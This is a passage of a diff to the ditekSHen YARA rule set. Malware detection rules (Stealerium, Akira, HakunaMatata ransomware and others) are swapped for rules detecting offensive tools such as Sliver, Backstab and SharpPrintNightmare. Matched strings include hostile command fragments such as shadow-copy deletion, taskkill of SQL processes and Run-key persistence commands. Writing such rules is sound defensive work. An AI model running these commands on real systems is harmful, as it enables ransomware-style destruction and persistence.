-		$s8 = "adAccountLimit\":(.*?)}" wide
-		$s9 = "|PUSH|" fullword wide
-		$s10 = "|SCREEN|" fullword wide
-		$s11 = "|SCREEC|" fullword wide
-		$s12 = "_ad_accounts>k__" ascii
-		$s13 = "get_Pwds" fullword ascii
-		$s14 = "Telegram.Bot" ascii
-		$s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00
-               78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00
-               7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00
-               43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00
-               00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00
-               74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00
-               52 00 7d 00 2e 00 6a 00 70 00 67 }
+		$s1 = "\\projects\\windows\\EmailPasswordDump\\Release\\FireMaster.pdb" ascii
+		$s2 = "//Dump all the Email passwords to a file \"c:\\passlist.txt\"" ascii
+		$s3 = "EmailPasswordDump" fullword wide
+		$s4 = "//Dump all the Email passwords to console" ascii
+		$s5 = "Email Password Dump" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 13 of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Grum : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpsphere : FILE
 {
 	meta:
-		description = "Detect Grum spam bot"
+		description = "Detects SharpSphere red teamers tool to interact with the guest operating systems of virtual machines managed by vCenter"
 		author = "ditekSHen"
-		id = "e9abaed1-f462-5099-b310-9f9244c0c8a2"
+		id = "878b5174-2368-5fc8-9573-7b2759cab409"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9993-L10007"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L766-L783"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74"
+		logic_hash = "aae9355fcc7a6b5faf3807c85983032519550e936d5660c823d13731083be512"
 		score = 75
 		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "loader_id" fullword ascii
-		$s2 = "start_srv" fullword ascii
-		$s3 = "lid_file_upd" fullword ascii
-		$s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii
-		$s5 = "rcpt to:<%s>" fullword ascii
-		$s6 = "ehlo %s" fullword ascii
-		$s7 = "%OUTLOOK_BND_" fullword ascii
+		$s1 = "get_virtualExecUsage" fullword ascii
+		$s2 = "Command to execute" fullword ascii
+		$s3 = "<guestusername>k__" ascii
+		$s4 = ".VirtualMachineDeviceRuntimeInfoVirtualEthernetCardRuntimeState" ascii
+		$s5 = "datastoreUrl" ascii
+		$s6 = "SharpSphere.vSphere." ascii
+		$s7 = "HelpText+vCenter SDK URL, i.e. https://127.0.0.1/sdk" ascii
+		$s8 = "[x] Execution finished, attempting to retrieve the results" fullword wide
+		$s9 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s10 = "C:\\Users\\Public\\" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Exchangeexploit : FILE
 {
 	meta:
-		description = "Detects downloader injector"
+		description = "Hunt for executables potentially embedding Exchange Server exploitation artificats"
 		author = "ditekSHen"
-		id = "244ad6fb-8769-5b57-84e2-66f51fccb32a"
+		id = "429f738a-009a-5326-92e0-bdc907be96f2"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10009-L10025"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L785-L798"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b"
+		logic_hash = "4b0d22a296cab6591d63568aa44845ef7fcc413d45c368a712928411d11a8177"
 		score = 75
-		quality = 73
+		quality = 69
 		tags = "FILE"
 
 	strings:
-		$x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide
-		$l1 = "[||]" wide
-		$r1 = "yromeMssecorPetirW" wide
-		$r2 = "xEcollAlautriV" wide
-		$r3 = "daerhTemuseR" ascii wide
-		$r4 = "noitceSfOweiVpamnUwZ" wide
-		$s1 = "Debugger Detected" fullword wide
-		$s2 = "payload" fullword ascii
-		$s3 = "_ENABLE_PROFILING" fullword wide
+		$s1 = "ecp/default.flt?" ascii wide nocase
+		$s2 = "owa/auth/logon.aspx?" ascii wide nocase
+		$s3 = "X-AnonResource-Backend" ascii wide
+		$s4 = "EWS/Exchange.asmx?" ascii wide nocase
+		$s5 = "X-BEResource" ascii wide
+		$s6 = "https://%s/owa/auth/" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 1 of ( $l* ) and 2 of ( $r* ) ) or 6 of them )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Stealerium : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Goclr : FILE
 {
 	meta:
-		description = "Detects Stealerium infostealer"
+		description = "Detects binaries utilizing Go-CLR for hosting the CLR in a Go process and using it to execute a DLL from disk or an assembly from memory"
 		author = "ditekSHen"
-		id = "ea137900-3add-54b4-9ce9-bc7e98f86d41"
+		id = "21766cad-17dd-525a-9ebe-cd90e892cff1"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10027-L10042"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L800-L814"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9"
+		logic_hash = "a2a79793b1f530bcf9f79983f29a655f270cf0147606690b19eaeb82d4bd1f0d"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "Stealerium" ascii wide
-		$x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
-		$x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
-		$s1 = "Timeout /T 2 /Nobreak" fullword wide
-		$s2 = "Directory not exists" wide
-		$s3 = "### {0} ### ({1})" wide
-		$s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
-		$s5 = " *Keylogger " fullword wide
+		$s1 = "github.com/ropnop/go-clr.(*IC" ascii
+		$s2 = "EnumKeyExWRegEnumValueWRegOpenKeyExWRtlCopyMemoryRtlGetVersionShellExecuteWStartServiceW" ascii
+		$c1 = "ICorRuntimeHost" ascii wide
+		$c2 = "CLRCreateInstance" ascii wide
+		$c3 = "ICLRRuntimeInfo" ascii wide
+		$c4 = "ICLRMetaHost" ascii wide
+		$go = "Go build ID:" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 2 of ( $c* ) and $go )
 }
-rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edgecookiesview : FILE
 {
 	meta:
-		description = "Detects GobRAT"
+		description = "Detects EdgeCookiesView"
 		author = "ditekSHen"
-		id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4"
+		id = "42c6eb2e-bf5c-5956-9009-c29551ce715d"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10044-L10062"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L833-L847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71"
+		logic_hash = "9ba6d416e02c1958806356c67636609dcca758da9f7e3d1fc15244cc5ff038fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "BotList" ascii
-		$x2 = "BotCount" ascii
-		$x3 = "/etc/services/zone/bot.log" ascii
-		$x4 = "aaa.com/bbb/me" ascii
-		$s1 = "encoding/gob." ascii
-		$s2 = ".GetMacAddress" ascii
-		$s3 = ".IpString2Uint32" ascii
-		$s4 = ".RegisterLogFile" ascii
-		$s5 = ".UniqueAppendString" ascii
-		$s6 = ".NewDaemon" ascii
-		$s7 = ".SimpleCommand" ascii
+		$s1 = "AddRemarkCookiesTXT" fullword wide
+		$s2 = "# Netscape HTTP Cookie File" fullword wide
+		$s3 = "/scookiestxt" fullword wide
+		$s4 = "/deleteregkey" fullword wide
+		$s5 = "Load cookies from:" wide
+		$s6 = "Old cookies folder of Edge/IE" wide
+		$pdb = "\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
+}
+rule DITEKSHEN_INDICATOR_TOOL_Sharpnopsexec : FILE
+{
+	meta:
+		description = "Detects SharpNoPSExec"
+		author = "ditekSHen"
+		id = "10898364-6d77-5127-a16b-5fd3b1c652d5"
+		date = "2020-11-06"
+		modified = "2024-09-25"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L849-L864"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "c1d76639e7b6464d302729b48bbcd810216132868035904bb9866e7b31ccfac2"
+		score = 75
+		quality = 75
+		tags = "FILE"
+
+	strings:
+		$s1 = "|-> Service" wide
+		$s2 = "authenticated as" wide
+		$s3 = "ImpersonateLoggedOnUser failed. Error:{0}" wide
+		$s4 = "uPayload" fullword ascii
+		$s5 = "pcbBytesNeeded" fullword ascii
+		$s6 = "SharpNoPSExec" ascii wide
+		$pdb1 = "SharpNoPSExec\\obj\\Debug\\SharpNoPSExec.pdb" ascii
+		$pdb2 = "SharpNoPSExec\\obj\\Release\\SharpNoPSExec.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Chromecookiesview : FILE
 {
 	meta:
-		description = "Detects HakunaMatata ransomware"
+		description = "Detects ChromeCookiesView"
 		author = "ditekSHen"
-		id = "43ca40bb-9eb6-558e-977d-f1fff5659565"
+		id = "c1b89468-edf2-59d1-89b3-5822fa19d6ab"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10064-L10084"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L866-L880"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c"
+		logic_hash = "81acd0978fc03525e7092ab51c681b61f9de0252066ce871298e2cd96b1d3024"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
-		$s3 = "<RSAKeyValue><Modulus>" wide
-		$s4 = "HAKUNA MATATA" ascii wide
-		$s5 = "EXCEPTIONAL_FILE" ascii
-		$s6 = "TRIPLE_ENCRYPT" ascii
-		$s7 = "FULL_ENCRYPT" ascii
-		$s8 = "TARGETED_EXTENSIONS" ascii
-		$s9 = "CHANGE_PROCESS_NAME" ascii
-		$s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii
-		$s11 = "<ALL_DRIVES>b__" ascii
-		$s12 = "dataToEncrypt" ascii
-		$s13 = "<RECURSIVE_DIRECTORY_LOOK>" ascii
+		$s1 = "AddRemarkCookiesTXT" fullword wide
+		$s2 = "Decrypt cookies" wide
+		$s3 = "/scookiestxt" fullword wide
+		$s4 = "/deleteregkey" fullword wide
+		$s5 = "Cookies.txt Format" wide
+		$s6 = "# Netscape HTTP Cookie File" wide
+		$pdb = "\\ChromeCookiesView\\Release\\ChromeCookiesView.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sliver : FILE
 {
 	meta:
-		description = "Detects HakunaMatata ransomware builder"
+		description = "Detects Sliver implant cross-platform adversary emulation/red team"
 		author = "ditekSHen"
-		id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652"
+		id = "e0c5404b-8e6b-5c3a-9e37-56012c3802dd"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10086-L10104"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L882-L900"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4"
+		logic_hash = "4f9442b74c84c7b4a8fcf93de2919d12efe2f41d0b4e8514b43822fba0962af2"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "ENCRYPT FILES IN PROCESS" wide
-		$s2 = "#TARGET_FILES" ascii wide
-		$s3 = "HAKUNA MATATA" ascii wide nocase
-		$s4 = "#PRIVATE_KEY" ascii wide
-		$s5 = "/target:winexe /platform:anycpu /optimize+" wide
-		$s6 = "/win32icon:" fullword wide
-		$s7 = "SkippedFolders" ascii
-		$s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii
-		$s9 = "DRAW_WALLPAPER(" ascii
-		$s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii
-		$s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii
+		$x1 = "github.com/bishopfox/sliver/protobuf/sliverpbb." ascii
+		$s1 = ".commonpb.ResponseR" ascii
+		$s2 = ".PortfwdProtocol" ascii
+		$s3 = ".WGTCPForwarder" ascii
+		$s4 = ".WGSocksServerR" ascii
+		$s5 = ".PivotEntryR" ascii
+		$s6 = ".BackdoorReq" ascii
+		$s7 = ".ProcessDumpReq" ascii
+		$s8 = ".InvokeSpawnDllReq" ascii
+		$s9 = ".SpawnDll" ascii
+		$s10 = ".TCPPivotReq" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 1 of ( $x* ) or 5 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Twarbot : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Owlproxy : FILE
 {
 	meta:
-		description = "Detect TWarBot IRC Bot"
+		description = "Hunt for OwlProxy"
 		author = "ditekSHen"
-		id = "3acae103-c8d8-5959-83fd-f47d33da350b"
+		id = "86e2144e-c5d3-5bd6-b287-1157066126a3"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10106-L10121"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L902-L921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b1b0b92d2ea7adec58a4b0ac712384542d96dc8707b6f1f13df2d8150a03a7a"
+		logic_hash = "fa7dd5eeb9799fd651317ceecbed6c960f16c387dc18723409053e44cd281582"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$x1 = "TWarBot" fullword ascii
-		$s1 = "PRIVMSG #" ascii
-		$s2 = "C:\\marijuana.txt" fullword ascii
-		$s3 = "C:\\rar.bat" fullword ascii
-		$s4 = "C:\\zip.bat" fullword ascii
-		$s5 = "software\\microsoft\\windows\\currentversion\\app paths\\winzip32.exe" ascii
-		$s6 = "software\\microsoft\\windows\\currentversion\\app paths\\WinRAR.exe" ascii
-		$s7 = "a -idp -inul -c- -m5" ascii
+		$is1 = "call_new command: " wide
+		$is2 = "call_proxy cmd: " wide
+		$is3 = "download_file: " wide
+		$is4 = "cmdhttp_run" wide
+		$is5 = "sub_proxyhttp_run" wide
+		$is6 = "proxyhttp_run" wide
+		$is7 = "webshell_run" wide
+		$is8 = "/exchangetopicservices/" fullword wide
+		$is9 = "c:\\windows\\system32\\wmipd.dll" fullword wide
+		$iu1 = "%s://+:%d%s" wide
+		$iu2 = "%s://+:%d%spp/" wide
+		$iu3 = "%s://+:%d%spx/" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 6 of ( $is* ) or ( all of ( $iu* ) and 2 of ( $is* ) )
 }
-rule DITEKSHEN_MALWARE_Win_G0Crypt : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Backstab : FILE
 {
 	meta:
-		description = "Detects G0Crypt / BRG0SNet / NovaGP ransomware"
+		description = "Detect Backstab tool capable of killing antimalware protected processes by leveraging sysinternals Process Explorer (ProcExp) driver"
 		author = "ditekSHen"
-		id = "c0dd8a1b-1aa6-50be-92c4-125eabaf3f9f"
+		id = "1e514d03-9b78-5e75-9a31-02c0413e23a7"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10123-L10156"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L923-L939"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a678bbb02b82c34fb5e7bdce2e60b0da88f12b094e7ca3b74345814d0da5ce42"
+		logic_hash = "d25c3ff4d7c120fdf7c275d11da7a321bcbdb275dcfaa699b5bb4bd66167ec92"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "G0Crypt/go/" ascii
-		$x2 = "BRG0SNet" ascii
-		$x3 = "/NovaGroup" ascii
-		$x4 = "novagroup@onionmail.org" ascii nocase
-		$x5 = "# Nova Group" ascii
-		$f1 = "main.HaveRun" ascii
-		$f2 = "main.FindFile" ascii
-		$f3 = "main.deriveKey" ascii
-		$f4 = "main.Pwd" fullword ascii
-		$f5 = "/ClearBashFile" ascii
-		$f6 = "/ClearUserTempFiles" ascii
-		$f7 = "/KillProccess" ascii
-		$f8 = "/Encryptor" ascii
-		$f9 = "/NoDirEncrypt" ascii
-		$f10 = "/RunCmdEexecutable" ascii
-		$f11 = "/StopImportantServices" ascii
-		$f12 = "/GetPwd" ascii
-		$s1 = "\\$Recycle.Bin"
-		$s2 = ".README.txt"
-		$s3 = "\\BRSPATH.exe"
-		$s4 = "taskkill /F /IM sql*"
-		$s5 = "C:\\inetpub\\logs\\"
-		$s6 = "shutdown /r"
-		$s7 = ":\\Program Files\\VMware\\"
-		$s8 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Message /t REG_SZ /d"
-		$s9 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v DelLogSoft /t REG_SZ /d"
+		$s1 = "NtLoadDriver: %x" fullword ascii
+		$s2 = "POSIXLY_CORRECT" fullword ascii
+		$s3 = "\\\\.\\PROCEXP" ascii
+		$s4 = "ProcExpOpenProtectedProcess.DeviceIoControl: %" ascii
+		$s5 = "ProcExpKillHandle.DeviceIoControl" ascii
+		$s6 = "[%#llu] [%ws]: %ws" fullword ascii
+		$s7 = "D:P(A;;GA;;;SY)(A;;GRGWGX;;;BA)(A;;GR" wide
+		$s8 = "-k -d c:\\\\driver.sys" ascii
+		$s9 = "backstab.exe -" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $f* ) or ( 1 of ( $x* ) and ( 5 of ( $f* ) or 5 of ( $s* ) ) ) or ( 6 of ( $f* ) and 4 of ( $s* ) ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Win_Akira : FILE
+rule DITEKSHEN_INDICATOR_TOOL_EXP_Sharpprintnightmare : FILE
 {
 	meta:
-		description = "Detects Akira Ransomware Windows"
+		description = "Detect SharpPrintNightmare"
 		author = "ditekSHen"
-		id = "350ecf81-7926-5cd2-b0c8-2dd748775e74"
+		id = "15f52fce-27cc-52e7-91d5-7e2f6db5b596"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10220-L10243"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L941-L961"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "73dd0a1b21be8ff7362536f6b6255cd19510632782effd67a56d7656bebf04ff"
+		logic_hash = "22c890a22ce6b7c1a06068018364f7c5a2afe1bee5b5bc6a8bae3703a11fac26"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "https://akira" ascii
-		$x2 = ":\\akira\\" ascii
-		$x3 = ".akira" ascii
-		$x4 = "akira_readme.txt" ascii
-		$x5 = "\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp" ascii
-		$s1 = "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" ascii
-		$s2 = "Win32_ProcessStartup" fullword wide
-		$s3 = /Failed\sto\smake\s(part|full|spot)\sencrypt/ ascii wide
-		$s4 = "--encryption_" ascii
-		$s5 = "--share_file" ascii
-		$s6 = { 24 00 52 00 45 00 43 00 59 00 43 00 4C 00 45 00 2E 00 42 00 49 00 4E 00 00 00 00 00 6? 6? 6? 00 (24|57) 00 (52|69) 00 }
-		$s7 = " PUBLIC KEY-----" ascii
-		$s8 = ".onion" ascii
-		$s9 = "/Esxi_Build_Esxi6/./" ascii nocase
-		$s10 = "No path to encrypt" ascii
-		$s11 = "-fork" fullword ascii
+		$s1 = "RevertToSelf() Error:" wide
+		$s2 = "NeverGonnaGiveYou" wide
+		$s3 = "\\Amd64\\UNIDRV.DLL" wide
+		$s4 = ":\\Windows\\System32\\DriverStore\\FileRepository\\" wide
+		$s5 = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}" wide
+		$s6 = "\\SharpPrintNightmare\\" ascii
+		$s7 = { 4e 61 6d 65 09 46 75 6c 6c 54 72 75 73 74 01 }
+		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\PackageInstallation\\Windows x64\\DriverPackages" wide
+		$s9 = "ntprint.inf_amd64" wide
+		$s10 = "AddPrinterDriverEx" wide
+		$s11 = "addPrinter" ascii
+		$s12 = "DRIVER_INFO_2" ascii
+		$s13 = "APD_COPY_" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_MALWARE_Linux_Akira : FILE
+rule DITEKSHEN_INDICATOR_TOOL_REC_Adfind : FILE
 {
 	meta:
-		description = "Detects Akira Ransomware Linux"
+		description = "Detect ADFind"
 		author = "ditekSHen"
-		id = "3ac144b3-c747-58e5-bc75-b3f90786f404"
+		id = "2f0d02a1-7488-5645-aa08-1eadee2862e8"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10245-L10264"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L963-L974"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a00154e1cfc442718e753641d3706ffd4dd8465525d0bb2854f74dfb1cf5dd0"
+		logic_hash = "41fb9f72032f76adc6f1fccd25a1364f153eb2430063e9d582f3dcd9fc9ac84a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "https://akira" ascii
-		$x2 = ":\\akira\\" ascii
-		$x3 = ".akira" ascii
-		$x4 = "akira_readme.txt" ascii
-		$s1 = "--encryption_" ascii
-		$s2 = "--share_file" ascii
-		$s3 = { 00 24 52 65 63 79 63 6c 65 2e 42 69 6e 00 24 52 45 43 59 43 4c 45 2e 42 49 4e 00 }
-		$s4 = " PUBLIC KEY-----" ascii
-		$s5 = ".onion" ascii
-		$s6 = "/Esxi_Build_Esxi6/./" ascii nocase
-		$s7 = "No path to encrypt" ascii
-		$s8 = "-fork" fullword ascii
+		$s1 = "\\AdFind\\AdFind\\AdFind.h" ascii
+		$s2 = "\\AdFind\\AdFind\\AdFind.cpp" ascii
+		$s3 = "\\AdFind\\Release\\AdFind.pdb" ascii
+		$s4 = "joeware_default_adfind.cf" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Romcom_Loader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_CNC_Chisel : FILE
 {
 	meta:
-		description = "Hunt for RomCom loader"
-		author = "ditekShen"
-		id = "49a5398a-e28d-51e2-90d5-479d815f9967"
+		description = "Detect binaries using Chisel"
+		author = "ditekSHen"
+		id = "d126f2c8-655f-564f-ae46-f6bd6385dcac"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10291-L10307"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L976-L990"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
